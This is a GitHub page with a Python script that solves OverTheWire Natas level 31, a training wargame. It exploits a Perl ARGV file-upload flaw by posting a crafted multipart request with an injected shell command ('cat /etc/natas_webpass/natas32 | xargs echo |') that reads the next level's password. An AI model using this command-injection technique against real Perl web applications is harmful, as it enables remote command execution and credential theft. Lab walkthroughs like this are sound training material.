-
Notifications
You must be signed in to change notification settings - Fork 2
/
natas31.py
43 lines (35 loc) · 1.23 KB
/
natas31.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
"""
Help script to resolve natas challenge #31
"""
import requests
import json
level = 'natas31'
url = 'http://{}.natas.labs.overthewire.org'.format(level)
with open('natas.json') as j:
credentials = json.load(j)
auth = (level, credentials[level])
del credentials
"""
In this level we exploit the vulnerability described in the document
The Pearl Jam. Section "The Pinnacle"
"""
'''
To upload a file we need the header:
Content-Type: multipart/form-data; boundary=---------------------------157700418326290811436937502
And the params:
-----------------------------157700418326290811436937502
Content-Disposition: form-data; name="file"
ARGV
-----------------------------157700418326290811436937502
Content-Disposition: form-data; name="file"; filename="abc"
abcde
-----------------------------157700418326290811436937502
Content-Disposition: form-data; name="submit"
Upload
-----------------------------157700418326290811436937502--
'''
response = requests.post(url + '/index.pl?cat /etc/natas_webpass/natas32 | xargs echo |',
files=[('file', ('filename', 'abc'))],
data={'file': 'ARGV'},
auth=auth)
print(response.text)